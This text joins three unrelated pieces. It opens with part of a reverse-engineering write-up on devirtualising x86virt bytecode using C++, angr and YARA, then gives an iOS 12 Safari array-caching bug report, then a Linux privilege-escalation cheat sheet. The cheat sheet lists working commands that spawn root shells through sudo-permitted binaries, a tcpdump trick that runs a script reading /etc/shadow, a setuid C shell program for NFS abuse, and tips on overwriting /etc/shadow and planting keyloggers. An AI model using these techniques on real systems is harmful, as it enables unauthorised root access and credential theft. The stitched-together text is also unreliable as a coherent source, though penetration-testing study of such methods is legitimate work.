When it comes to disassembling x86virt bytecode instructions, we do that with a different subroutine, disassembleVmInstruction. The purpose of this subroutine is fairly straightforward so I won’t bore you by reading the code line by line. However, some interesting cases are case 1 and case 2, which are essentially x86 instructions with VMR as the operand. It is also worth noting case 7 where the decoding of x86virt jump instructions are handled and case 16 which just signals for the VM to stop interpreting (and has no x86 equivalent)

Once we can disassemble the instructions, we need to properly identify where they are. As was previously mentioned, this requires some control flow analysis. During control flow analysis, the disassembler identifies the different blocks of code in a subroutine by using the getDisassembleRegions function. The getDisassembleRegions basically returns the regions of code in a method that can be reached using conditional or unconditional jumps inside of a virtualized function. We can see its behaviour below:

vector<DisassembledRegion> getDisassembleRegions(const uint32_t initialIp, VmInfo& vmInfo) {
    vector<DisassembledRegion> disassembledStubs;
    queue<uint32_t> stubsToDisassemble;
    stubsToDisassemble.push(initialIp);

    while(!stubsToDisassemble.empty()) {
        uint32_t vmRelativeIp = stubsToDisassemble.front() - vmInfo.getBaseAddress();
        stubsToDisassemble.pop();

        if(isInRegions(disassembledStubs, vmRelativeIp))
            continue;

        DisassembledRegion current;
        current.min = vmRelativeIp;

        bool continueDisassembling = true;
        while(vmRelativeIp <= vmInfo.getDumpSize() && continueDisassembling) {

            vector<DecodedVmInstruction> instrSet;

            vmRelativeIp += decodeVmInstruction(instrSet, vmRelativeIp, vmInfo);

            for(auto& instr : instrSet) {
                if(instr.type == DecodedInstructionType_t::INSTR_UNKNOWN) {
                    stringstream msg;
                    msg << "Unknown instruction encountered: 0x" << hex << ((unsigned long)instr.bytes[0]);
                    throw runtime_error(msg.str());
                }

                if(instr.type == DecodedInstructionType_t::INSTR_JUMP || instr.type == DecodedInstructionType_t::INSTR_CONDITIONAL_JUMP)
                    stubsToDisassemble.push(instr.controlDestination);

                if(instr.type == DecodedInstructionType_t::INSTR_STOP || instr.type == DecodedInstructionType_t::INSTR_RETN || instr.type == DecodedInstructionType_t::INSTR_JUMP)
                    continueDisassembling = false;
            }
        }

        current.max = vmRelativeIp;
        disassembledStubs.push_back(current);
    }

    //Now we must resolve all overlapping stubs
    for(auto it = disassembledStubs.begin(); it != disassembledStubs.end();) {
        if(isInRegions(disassembledStubs, it->min, it->max))
            disassembledStubs.erase(it++);
        else
            it++;
    }

    return disassembledStubs;
}

The getDisassembleRegions performs the following functionality:

  1. Disassemble the virtualized subroutine from its start address and continues to do so until it encounters a jump (conditional or unconditional) or a return.
  2. If a conditional jump is encountered, its destination address is queued up to be the next region to be disassembled and the disassembler continues executing.
  3. If an unconditional jump is encountered, the destination address is queued up and disassembling of the current block ends
  4. If a ret is encountered, disassembling of the current block ends.
  5. Loops until there are no more regions to be disassembled.

The problem with the above algorithm is that it will identify code such as what is seen below:

labelD:
...
...
labelA:
...
...
jmp labelB
...
...
labelB:
...
...
jz labelD
...

As having overlapping blocks of code, which will result in redundant blocks of code and thus redundant disassembled output. This was solved by testing for and removing smaller overlapping regions:

    //Now we must resolve all overlapping stubs
    for(auto it = disassembledStubs.begin(); it != disassembledStubs.end();) {
        if(isInRegions(disassembledStubs, it->min, it->max))
            disassembledStubs.erase(it++);
        else
            it++;
    }

    return disassembledStubs;

After we know the basic blocks of a subroutine that contain valid executable code, we can begin disassembling them. This is done in the disassembleStub routine:

bool disassembleStub(const uint32_t initialIp, VmInfo& vmInfo) {

    vector<DisassembledRegion> stubs = getDisassembleRegions(initialIp, vmInfo);

    //Needs to be sorted, otherwise (due to jump sizes) may not fit into original location
    //Sorting should match it with the way it was implemented.
    sort(stubs.begin(), stubs.end(), sortRegionsAscending);

    if(stubs.empty()) {
        printf(";No stubs detected to disassemble.. %d", stubs.size());
        return true;
    }

    vector<DecodedVmInstruction> instructions;
    for(auto& stub : stubs) {

        bool continueDisassembling = true;
        DecodedVmInstruction blockMarker;
        blockMarker.type = DecodedInstructionType_t::INSTR_COMMENT;
        strcpy(blockMarker.disassembled, "BLOCK");
        instructions.push_back(blockMarker);
        for(uint32_t vmRelativeIp = stub.min; continueDisassembling && vmRelativeIp < stub.max;) {

            vector<DecodedVmInstruction> instrSet;

            vmRelativeIp += decodeVmInstruction(instrSet, vmRelativeIp, vmInfo);

            for(auto& instr : instrSet) {
                if(instr.type == DecodedInstructionType_t::INSTR_UNKNOWN)
                    throw runtime_error("Unknown instruction encountered");

                if(instr.type == DecodedInstructionType_t::INSTR_STOP) {
                    continueDisassembling = false;
                    break;
                }

                instructions.push_back(instr);
            }

        }

        instructions.push_back(blockMarker);
    }

    for(auto& i : eliminateVmr(instructions)) {
        formatInstructionInfo(i);
    }

    return true;
}

An important note with this method is that it sorts the disassembled regions by their start address after doing the control flow analysis with getDisassembledRegions. This sorting must be done because the natural order was thrown out of whack by the queuing nature of the control flow analysis. Functionally, the order doesn’t really make a difference in a normal application because at the end of the day, the code is still going to execute the same way regardless of where the instructions are. However, the way in which the blocks are organized will change the size of the code once it is assembled in NASM due to the way jump instructions are encoded on the x86 platform. Essentially, the distance between the jump instructions and their destination addresses will change depending on the order of the code blocks in the function, and the distance will influence the size of the jump instruction. If the devirtualized code is not the size of its original form (i.e, before it is was passed into x86virt to be virtualized) or smaller, then it will not fit back into where it was ripped from. While functionally, it doesn’t matter that it isn’t in the «proper» location, it does matter later when we encounter multiple VM layers because our signatures will not match partial handlers etc.

Other than that, there isn’t anything too weird or noteworthy here until we encounter the call to eliminateVmr. Remember that I mentioned how x86virt creates a virtual register. We need to eliminate that because we cannot assemble that through NASM or produce valid x86 code while we have a virtual register. Below, we can see the behaviour of eliminateVmr:

vector<DecodedVmInstruction> eliminateVmr(vector<DecodedVmInstruction>& instructions) {
    auto itVmrStart = instructions.end();
    vector<DecodedVmInstruction> compactInstructionlist;

    for(auto it = instructions.begin(); it != instructions.end(); it++) {
        if(!strncmp("mov VMR,", it->disassembled, 8) && itVmrStart == instructions.end()) {
            itVmrStart = it;
        }else if(itVmrStart != instructions.end() && strstr(it->disassembled, "[VMR]") != 0)
        {
            for(auto listing = itVmrStart; listing != it+1; listing++) {
                DecodedVmInstruction comment = *listing;
                comment.type = INSTR_COMMENT;
                compactInstructionlist.push_back(comment);
            }
            compactInstructionlist.push_back(eliminateVmrFromSubset(itVmrStart, it + 1));
            itVmrStart = instructions.end();
        } else if (itVmrStart == instructions.end()) {
            compactInstructionlist.push_back(*it);
        }
    }

    return compactInstructionlist;
}

The way VMR is used in the virtualized code is fairly convenient. VMR is essentially used to calculate pointer addresses. For example, it only ever appears in a similar form to:

mov VMR, 0
add VMR, ecx
shl VMR, 2
add VMR, 15
mov eax, [VMR]

It always starts with operations on VMR and ends with VMR being dereferenced. This means that we can essentially replace all of those instructions with:

mov eax, [ecx * 2 + 15]

So eliminateVmr will look for a pattern where the destination operand is VMR and then some operations on VMR followed by a dereference on VMR. Everything between that pattern can always be simplified using the same algorithm. You can see the specifics of that algorithm in eliminateVmrFromSubset:

DecodedVmInstruction eliminateVmrFromSubset(vector<DecodedVmInstruction>::iterator start, vector<DecodedVmInstruction>::iterator end) {
    bool baseReg2Used = false;
    bool baseReg1Used = false;
    char baseReg1Buffer[10];
    char baseReg2Buffer[10];
    uint32_t multiplierReg1 = 1;
    uint32_t multiplierReg2 = 1;

    uint32_t offset = 0;

    for(auto it = start; it != end; it++) {
        char* dereferencePointer = 0;

        if(!strncmp(it->disassembled, "mov VMR, 0x", 11)) {
            offset = strtoul(&it->disassembled[11], NULL, 16);
            baseReg1Used = false;
            baseReg2Used = false;
            multiplierReg1 = multiplierReg2 = 1;
        } else if(!strncmp(it->disassembled, "mov VMR, ", 9)) {
            baseReg1Used = true;
            baseReg2Used = false;
            multiplierReg1 = multiplierReg2 = 1;
            offset = 0;
            strcpy(baseReg1Buffer, &it->disassembled[9]);
        } else if(!strncmp(it->disassembled, "add VMR, 0x", 11)) {
            offset += strtoul(&it->disassembled[11], NULL, 16);
        } else if(!strncmp(it->disassembled, "add VMR, ", 9)) {
            if(baseReg1Used) {
                baseReg2Used = true;
                strcpy(baseReg2Buffer, &it->disassembled[9]);
            } else {
                baseReg1Used = true;
                strcpy(baseReg1Buffer, &it->disassembled[9]);    
            }
        } else if(!strncmp(it->disassembled, "shl VMR, 0x", 11)) {
            uint32_t shift = strtoul(&it->disassembled[11], NULL, 16);
            offset = offset << shift;
            if(baseReg1Used) {
                multiplierReg1 = multiplierReg1 << shift;
            }
            if(baseReg2Used) {
                multiplierReg2 = multiplierReg2 << shift;
            }
        }
    }

    auto lastInstruction = end - 1;
    string reconstructInstr(lastInstruction->disassembled);
    stringstream reconstructed;

    reconstructed << "[";

    if(baseReg1Used) {
        if(multiplierReg1 != 1)
            reconstructed << "0x" << hex << multiplierReg1 << " * ";

        reconstructed << baseReg1Buffer;
    }

    if(baseReg2Used) {
        reconstructed << " + ";
        if(multiplierReg2 != 1)
            reconstructed << "0x" << hex << multiplierReg2 << " * ";

        reconstructed << baseReg2Buffer;
    }

    if(offset != 0 || !(baseReg1Used))
        reconstructed <<  " + 0x" << hex << offset;

    reconstructed << "]";

    reconstructInstr.replace(reconstructInstr.find("[VMR]"), 5, reconstructed.str());

    DecodedVmInstruction result;

    result.isDecoded = true;
    result.address = start->address;
    result.size = 0;
    result.type = lastInstruction->type;
    strcpy(result.disassembled, reconstructInstr.c_str());

    return result;
}

Once VMR is eliminated, all that is left to do is print out the disassembly, which we can see being done here in disassembleStub:

...
    for(auto& i : eliminateVmr(instructions)) {
        formatInstructionInfo(i);
    }
...

Generating a Jump Map with Angr

As I mentioned earlier, when it comes to the x86virt bytecode conditional / unconditional jump instruction handler, we need to extract the jump mappings (that is, which value in the jump type operand matches which type of jump). The way the x86virt jump handler works is that it takes the first operand (which is the jump type) and passes it into a somewhat randomly generated subroutine. This subroutine returns true if the EFLAGS are in a condition that permits jumping, or false otherwise.

Because this subroutine is not static and is a bit different for every VM Layer or virtualized target, we need some way of extracting these mappings out of that randomly generated subroutine. If you are not familiar with Angr or symbolic execution, I suggest you read a tiny bit on it before reading this section because the learning curve can be a bit steep.

The jump maps are extracted by running an Angr simulation on the jump decoder that was extracted from the protected application. The simulation is done in x86devirt_jmp.py and the dump of the decoder is provided by x86devirt.py (which we will get into later).

The way this was performed was first by creating a table of x86 jump types with EFLAG values that permit a jump to be taken for that jump type and EFLAG values that do not permit a jump to be taken. Additionally, all jump types in the table were prioritized.

Jump type priority worked by giving x86 jump types that test less flags a lower priority than jump types that test more flags. The reason jump types need to be prioritized is because there is overlap in the conditions that need to be checked for different jumps. An example of this is the JZ jump (ZF = 0) and the JA (ZF = 0 and CF = 0) jump. Essentially, if a set of x candidate x86 jump types can be mapped to a particular jump type y, then y should be mapped to the highest priority jump type in the set of x.

Below we see the list of possible jumps:

possibleJmps = [
    {
        "name": "jz",
        "must": [0x40],
        "not": [0x1, 0],
        "priority": 1
    },
    {
        "name": "jo",
        "must": [0x800],
        "not": [0],
        "priority": 1
    },
    ...
    ...

Below is the code responsible for mapping which emulated states permit jumping and which states do not, for all jump types (0-15):

def getJmpStatesMap(proj):
    statesMap = {}

    state = proj.factory.blank_state(addr=0x0)
    state.add_constraints(state.regs.edx >= 0)
    state.add_constraints(state.regs.edx <= 15)
    simgr = proj.factory.simulation_manager(state)
    r = simgr.explore(find=0xDA, avoid=0xDE, num_find=100)

    for state in r.found:
        val = state.solver.eval(state.regs.edx)
        val = val - 0xD
        val = val / 2

        if(not statesMap.has_key(val)):
            statesMap[val] = {"must": [], "not": []}

        statesMap[val]["must"].append(state)

    state = proj.factory.blank_state(addr=0x0)
    state.add_constraints(state.regs.edx >= 0)
    state.add_constraints(state.regs.edx <= 15)
    simgr = proj.factory.simulation_manager(state)
    r = simgr.explore(find=0xDE, avoid=0xDA, num_find=100)

    for state in r.found:
        val = state.solver.eval(state.regs.edx)
        val = val - 0xD
        val = val / 2

        statesMap[val]["not"].append(state)

    return statesMap

The method essentially performs the following:

  1. Iterate through all states that reach a positive/negative return (jump allowed or not allowed to be taken)
  2. Resolve the constraint on the jump type (Jump type is stored in EDX)
  3. Append that state to either the «must» set, which is states that reached a positive return permitting the jump to be taken (offset 0xDA in the dumped jump decoder code) or «not» (offset 0xDE in the dumped jump decoder code)

After we know which states permit jumping or restrict jumping for each jump type, we can begin testing the constraints on the EFLAGS register that allow for arriving at those states to determine which kind of x86 jump it maps to:

def decodeJumps(inputFile):
    proj = angr.Project(inputFile, main_opts={'backend': 'blob', 'custom_arch': 'i386'}, auto_load_libs=False)

    stateMap = getJmpStatesMap(proj)
    jumpMappings = {}
    for key, val in stateMap.iteritems():

        for jmp in possibleJmps:
            satisfiedMustsRemaining = len(jmp["must"])
            satisfiedNotsRemaining = len(jmp["not"])

            for state in val["must"]:
                for con in jmp["must"]:
                    if (state.solver.satisfiable(
                            extra_constraints=[state.regs.eax & controlFlowBits == con & controlFlowBits])):
                        satisfiedMustsRemaining -= 1;

            for state in val["not"]:
                for con in jmp["not"]:
                    if (state.solver.satisfiable(
                            extra_constraints=[state.regs.eax & controlFlowBits == con & controlFlowBits])):
                        satisfiedNotsRemaining -= 1;

            if(satisfiedMustsRemaining <= 0 and satisfiedNotsRemaining <= 0):
                if(not jumpMappings.has_key(key)):
                    jumpMappings[key] = []

                jumpMappings[key].append(jmp)

    finalMap = {}
    for key, val in jumpMappings.iteritems():
        maxPriority = 0;
        jmpName = "NOE FOUND"
        for j in val:
            if(j["priority"] > maxPriority):
                maxPriority = j["priority"]
                jmpName = j["name"]
        finalMap[jmpName] = key
        print("Mapped " + str(key) + " to " + jmpName)

    proj.terminate_execution()
    return finalMap

For each possible x86virt jump type, we test against each candidate x86 jump type to see if the x86 jump’s «not» and «must» sets can be satisfied accordingly by the restrictions on the EFLAGS registers in each state. If all «not»s and «must»s are satisfied, then the x86 jump is added as a possible candidate for that jump type.

Later, we iterate through all candidate x86 jumps for each jump type and choose the one with the highest priority to be mapped to it.

Finding the Signatures in the Protected Binary & Dumping Required Data

Finally, on to the last module needed to devirtualize code. x86devirt.py is the x64dbgpy Python plugin that instructs x64dbg on how to devirtualize the target.

x86devirt uses YARA rules to locate sections of code in the protected application, including the VM Stub, the instruction handlers, etc… You can see these YARA rules in VmStub.yara, VmRef.yara and instructions.yara:

  1. VmStub.yara is the YARA signature of the Virtual Machine interpreter.
  2. VmRef.yara is the YARA signature to detect where the application passes control off to the interpreter to begin interpreting a section of x86virt bytecode.
  3. instructions.yara is a set of YARA signatures for the different x86 instruction handlers.

An important note with these signatures is that they must match the original VM Stub and the devirtualized code generated by x86devirt. For example, consider a target that has been virtualized using two VM layers. After the first layer has been devirtualized, there will be a new VM stub in plain x86 form (that is, the second layer of virtualization). These signatures need to detect that second layer. However, the second layer was assembled using a different environment than the first layer and thus we need to take care for some special x86 instruction encodings in our signature (some x86 instructions have more than one way of being encoded). For example, consider:

add eax, ebx ; Encoded as 03C3
add eax, ebx ; Encoded as 01D8

So, when developing our signatures, we need to keep in mind that NASM could choose either encoding. With YARA, I just masked out instructions like these. If you are ever developing a signature with these constraints, please look into this more. There are plenty of resources on this topic: https://www.strchr.com/machine_code_redundancy

When it comes to devirtualizing x86virt, we must perform the following:

  1. Locate all VM Stubs that are present in plain x86 form using the vmStub.yara YARA signature
  2. Extract the decryption routine from the VM Stub
  3. Locate all references to that VM Stub (i.e, all areas where the VM is invoked to begin virtualizing code)
  4. Through each reference, extract the address where the virtualized bytecode is, and where the original code was ripped from
  5. Emulate part of the VM Stub to locate all instruction handlers and their opcodes
  6. Apply the YARA signatures to identify which handler (and subsequently, opcode) maps to which instruction behaviour and produce the instruction / opcode mappings
  7. Locate the JXX instruction handler and dump the part of the handler responsible for testing whether, given the jump type and state of the EFLAGS, the jump is taken. This is passed to x86devirt_jmp.py to extract the jump mappings
  8. For each reference, dump the virtualized code around that references and, with the jmp mappings, instruction mappings and the decryption routine, feed it to the x86virt-disassembler to be disassembled
  9. Finally, run NASM on the disassembler output to produce a x86 binary blob that can be written into where the virtualized code was ripped from, therefore restoring the virtualized function to its original form
  10. Loop back and search for any newly unveiled VM stubs

This process, once completed, will leave the x64dbg debugger in a state that allows the application to be cleanly dumped without any need for the VM stub.

(https://github.com/JeremyWildsmith)

Serious bug, Array state will be cached in iOS 12 Safari.

Some problem of Array’s value state in the newly released iOS 12 Safari, for example, code like this:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>iOS 12 Safari bugs</title>
    <script type="text/javascript">
    window.addEventListener("load", function ()
    {
        let arr = [1, 2, 3, 4, 5];
        alert(arr.join());

        document.querySelector("button").addEventListener("click", function ()
        {
            arr.reverse();
        });
    });
    </script>
</head>
<body>
    <button>Array.reverse()</button>
    <p style="color:red;">test: click button and refresh page, code:</p>
</body>
</html>

It’s definitely a BUG! And it’s a very serious bug.

As my test, the bug is due to the optimization of array initializer which all values are primitive literal. For example () => [1, null, 'x'] will return such arrays, and all return arrays link to same memory address, and some method like toString() is also memorized. Normally, any mutable operation on such array will copy to a individual memory space and link to it, this is so-called copy-on-write technique (https://en.wikipedia.org/wiki/Copy-on-write).

reverse() method will mutate the array, so it should trigger CoW, Unfortunately, it doesn’t now, which cause bug.

On the other hand, all methods which do not modify the array should not trigger CoW, and I find that even a.fill(value, 0, 0) or a.copyWithin(index, 0, 0) won’t trigger CoW because such callings don’t really mutate the array. But I notice that a.slice() WILL trigger CoW. So I guess the real reason of this bug may be someone accidentally swap the index of slice and reverse.

Add a demo page, try it use iOS 12 Safari: https://cdn.miss.cat/demo/ios12-safari-bug.html

thanks

Linux Privilege Escalation

Once we have a limited shell it is useful to escalate that shells privileges. This way it will be easier to hide, read and write any files, and persist between reboots.

In this chapter I am going to go over these common Linux privilege escalation techniques:

  • Kernel exploits
  • Programs running as root
  • Installed software
  • Weak/reused/plaintext passwords
  • Inside service
  • Suid misconfiguration
  • Abusing sudo-rights
  • World writable scripts invoked by root
  • Bad path configuration
  • Cronjobs
  • Unmounted filesystems

Enumeration scripts

I have used principally three scripts that are used to enumerate a machine. They are some difference between the scripts, but they output a lot of the same. So test them all out and see which one you like best.

LinEnum

https://github.com/rebootuser/LinEnum

Here are the options:

-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-r Enter report name
-h Displays this help text

Unix privesc

http://pentestmonkey.net/tools/audit/unix-privesc-check
Run the script and save the output in a file, and then grep for warning in it.

Linprivchecker.py

https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py

Privilege Escalation Techniques

Kernel Exploits

By exploiting vulnerabilities in the Linux Kernel we can sometimes escalate our privileges. What we usually need to know to test if a kernel exploit works is the OS, architecture and kernel version.

Check the following:

OS:

Architecture:

Kernel version:

uname -a
cat /proc/version
cat /etc/issue

Search for exploits

site:exploit-db.com kernel version

python linprivchecker.py extended

Don’t use kernel exploits if you can avoid it. If you use it it might crash the machine or put it in an unstable state. So kernel exploits should be the last resort. Always use a simpler priv-esc if you can. They can also produce a lot of stuff in the sys.log. So if you find anything good, put it up on your list and keep searching for other ways before exploiting it.

Programs running as root

The idea here is that if specific service is running as root and you can make that service execute commands you can execute commands as root. Look for webserver, database or anything else like that. A typical example of this is mysql, example is below.

Check which processes are running

# Metasploit
ps

# Linux
ps aux

Mysql

If you find that mysql is running as root and you username and password to log in to the database you can issue the following commands:

select sys_exec('whoami');
select sys_eval('whoami');

If neither of those work you can use a User Defined Function/

User Installed Software

Has the user installed some third party software that might be vulnerable? Check it out. If you find anything google it for exploits.

# Common locations for user installed software
/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/

# Debian
dpkg -l

# CentOS, OpenSuse, Fedora, RHEL
rpm -qa (CentOS / openSUSE )

# OpenBSD, FreeBSD
pkg_info

Weak/reused/plaintext passwords

  • Check file where webserver connect to database (config.php or similar)
  • Check databases for admin passwords that might be reused
  • Check weak passwords
username:username
username:username1
username:root
username:admin
username:qwerty
username:password
  • Check plaintext password
# Anything interesting the the mail?
/var/spool/mail
./LinEnum.sh -t -k password

Service only available from inside

It might be that case that the user is running some service that is only available from that host. You can’t connect to the service from the outside. It might be a development server, a database, or anything else. These services might be running as root, or they might have vulnerabilities in them. They might be even more vulnerable since the developer or user might be thinking «since it is only accessible for the specific user we don’t need to spend that much of security».

Check the netstat and compare it with the nmap-scan you did from the outside. Do you find more services available from the inside?

# Linux
netstat -anlp
netstat -ano

Suid and Guid Misconfiguration

When a binary with suid permission is run it is run as another user, and therefore with the other users privileges. It could be root, or just another user. If the suid-bit is set on a program that can spawn a shell or in another way be abuse we could use that to escalate our privileges.

For example, these are some programs that can be used to spawn a shell:

nmap
vim
less
more

If these programs have suid-bit set we can use them to escalate privileges too. For more of these and how to use the see the next section about abusing sudo-rights:

nano
cp
mv
find

Find suid and guid files

#Find SUID
find / -perm -u=s -type f 2>/dev/null

#Find GUID
find / -perm -g=s -type f 2>/dev/null

Abusing sudo-rights

If you have a limited shell that has access to some programs using sudo you might be able to escalate your privileges with. Any program that can write or overwrite can be used. For example, if you have sudo-rights to cp you can overwrite /etc/shadow or /etc/sudoers with your own malicious file.

awk

awk 'BEGIN {system("/bin/bash")}'

bash

cp
Copy and overwrite /etc/shadow

find

sudo find / -exec bash -i \;

find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;

ht

The text/binary-editor HT.

less

From less you can go into vi, and then into a shell.

sudo less /etc/shadow
v
:shell

more

You need to run more on a file that is bigger than your screen.

sudo more /home/pelle/myfile
!/bin/bash

mv

Overwrite /etc/shadow or /etc/sudoers

man

nano

nc

nmap

python/perl/ruby/lua/etc

sudo perl
exec "/bin/bash";
ctr-d
sudo python
import os
os.system("/bin/bash")

sh

tcpdump

echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

vi/vim

Can be abused like this:

sudo vi
:shell

:set shell=/bin/bash:shell    
:!bash

How I got root with sudo/

World writable scripts invoked as root

If you find a script that is owned by root but is writable by anyone you can add your own malicious code in that script that will escalate your privileges when the script is run as root. It might be part of a cronjob, or otherwise automatized, or it might be run by hand by a sysadmin. You can also check scripts that are called by these scripts.

#World writable files directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null

# World executable folder
find / -perm -o x -type d 2>/dev/null

# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

Bad path configuration

Putting . in the path
If you put a dot in your path you won’t have to write ./binary to be able to execute it. You will be able to execute any script or binary that is in the current directory.

Why do people/sysadmins do this? Because they are lazy and won’t want to write ./.

This explains it
https://hackmag.com/security/reach-the-root/
And here
http://www.dankalia.com/tutor/01005/0100501004.htm

Cronjob

With privileges running script that are editable for other users.

Look for anything that is owned by privileged user but writable for you:

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Unmounted filesystems

Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.

mount -l
cat /etc/fstab

NFS Share

If you find that a machine has a NFS share you might be able to use that to escalate privileges. Depending on how it is configured.

# First check if the target machine has any NFS shares
showmount -e 192.168.1.101

# If it does, then mount it to you filesystem
mount 192.168.1.101:/ /tmp/

If that succeeds then you can go to /tmp/share. There might be some interesting stuff there. But even if there isn’t you might be able to exploit it.

If you have write privileges you can create files. Test if you can create files, then check with your low-priv shell what user has created that file. If it says that it is the root-user that has created the file it is good news. Then you can create a file and set it with suid-permission from your attacking machine. And then execute it with your low privilege shell.

This code can be compiled and added to the share. Before executing it by your low-priv user make sure to set the suid-bit on it, like this:

chmod 4777 exploit
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
    setuid(0);
    system("/bin/bash");
    return 0;
}

Steal password through a keylogger

If you have access to an account with sudo-rights but you don’t have its password you can install a keylogger to get it.

World writable directories

/tmp
/var/tmp
/dev/shm
/var/spool/vbox
/var/spool/samba

References

http://www.rebootuser.com/?p=1758

http://netsec.ws/?p=309

https://www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/

Watch this video!
http://www.irongeek.com/i.php?page=videos/bsidesaugusta2016/its-too-funky-in-here04-linux-privilege-escalation-for-fun-profit-and-all-around-mischief-jake-williams

http://www.slideshare.net/nullthreat/fund-linux-priv-esc-wprotections

https://www.rebootuser.com/?page_id=1721